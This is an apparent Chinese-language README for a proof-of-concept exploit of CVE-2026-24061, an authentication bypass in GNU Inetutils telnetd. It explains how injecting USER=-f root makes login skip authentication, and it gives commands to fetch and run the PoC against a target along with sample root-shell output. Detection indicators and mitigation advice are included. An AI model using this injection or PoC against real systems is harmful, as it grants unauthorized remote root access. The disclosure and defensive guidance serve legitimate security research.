CVE: CVE-2026-24061
严重性: 严重 (Critical)
CVSS: 9.8 (严重)
CWE: CWE-88 — 命令中参数分隔符的不当中和
受影响组件: GNU Inetutils telnetd
受影响版本: 1.9.3 至 2.7
CVE-2026-24061 是 GNU Inetutils 提供的 Telnet 服务器实现中的一个严重认证绕过漏洞。 该漏洞源于在启用 Telnet 自动登录功能时,对客户端控制的 USER 环境变量验证不足。恶意值可能被解释为系统 login 程序的选项,而非用户名。 在易受攻击的配置下,未经认证的远程攻击者可能利用此行为调用带 -f 选项的 login 并绕过认证,从而可能获得所请求账户权限的 shell。
当受影响的 Telnet 服务以 root 权限运行时,成功利用可导致未经认证的远程 root 访问。
易受攻击的执行流程可概括为:
Telnet 客户端
│
│ USER=-f root
▼
telnetd
│
│ 构造 login 参数
▼
login -f root
│
│ 认证绕过
▼
root shell
该问题通过 Telnet 自动登录功能与 USER 环境变量处理之间的交互触发。
攻击者控制的值:
-f root
并未被严格视为用户名。相反,它可能成为 login 的参数,导致行为等同于:
login -f root
-f 选项指示 login 绕过指定用户的正常认证过程。
该仓库包含一个 Python 3 概念验证脚本,用于执行 Telnet 连接、处理所需的协议协商、注入恶意 USER 值,并验证生成的会话。
git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
cd CVE-2026-24061-Telnetd
chmod +x poc.py
python3 poc.py <TARGET> <PORT>
wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py
使 PoC 可执行:
chmod +x poc.py
通过提供目标地址和 Telnet 端口运行:
python3 poc.py <TARGET> <PORT>
python3 poc.py 127.0.0.1 23
成功利用
CVE-2026-24061 - GNU Inetutils telnetd 认证绕过
[*] 目标: 127.0.0.1:23
[+] 已连接
[*] 已注入 USER=-f root
[+] 存在漏洞
随后 PoC 提供一个交互式会话。
id
uid=0(root) gid=0(root) groups=0(root)
这确认了 Telnet 认证机制已被绕过,生成的会话具有 root 权限。
该漏洞利用执行以下操作:
连接到目标 Telnet 服务。 执行所需的 Telnet 协议协商。 启用利用所需的自动登录行为。 提供恶意 USER=-f root 值。 允许易受攻击的 telnetd 实现将篡改后的值传递给 login。 接收生成的会话。 向操作员提供交互式终端。
PoC 不依赖凭据来利用易受攻击的认证路径。
利用取决于目标配置以及 telnetd 与系统 login 实现之间的交互。
主要条件包括:
受影响版本范围内的 GNU Inetutils telnetd。
攻击者可访问的 Telnet 服务。
自动登录功能已启用或可用。
对 USER 环境变量的易受攻击处理。
能够解释注入选项的兼容 login 实现。
因此,仅存在受影响的 Inetutils 版本不应被视为可利用性的证明。还必须考虑发行版补丁和服务配置。
CVE-2026-24061 可完全攻陷易受攻击的系统。
根据 telnetd 运行时的权限,利用可能提供:
认证绕过
未经授权的本地账户访问
远程命令执行
权限提升
root 级访问
完全系统攻陷
最高风险场景是远程可访问的 Telnet 服务,利用该服务可获得 root 会话。
潜在的利用迹象包括:
对 TCP/23 的意外连接。
使用异常用户名的 Telnet 认证尝试。
以命令行选项开头的可疑 USER 值。
意外的 login 进程参数。
源自 telnetd 的 root 会话。
Telnet 服务产生的意外进程。
网络监控还应识别不必要地暴露 Telnet 服务的系统。
建议的应对措施是移除 Telnet 并使用 SSH 进行远程管理。
如果无法立即移除 Telnet:
升级到包含安全修复的供应商提供版本。
应用相应的操作系统安全更新。
将 TCP/23 限制在受信任的管理网络中。
防止 Telnet 直接暴露于不受信任的网络。
监控 Telnet 认证和进程活动。
由于 Linux 发行版可能在不更改上游版本号的情况下回溯安全修复,管理员应验证其发行版包的安全状态,而不是仅依赖显示的版本号。
该漏洞已在运行于 Ubuntu 22.04.5 LTS 上的易受攻击 GNU Inetutils Telnet 服务上成功复现。
PoC 建立了到 TCP/23 的连接,注入了:
USER=-f root
并获得了 root 会话。
权限验证返回:
uid=0(root) gid=0(root) groups=0(root)
这直接确认了安全影响。
此概念验证仅供安全研究、漏洞验证、授权渗透测试和教育目的使用。
仅测试您拥有明确授权的系统。
Gabriel D. Ishengoma
进攻性安全 · 网络安全研究 · 数字取证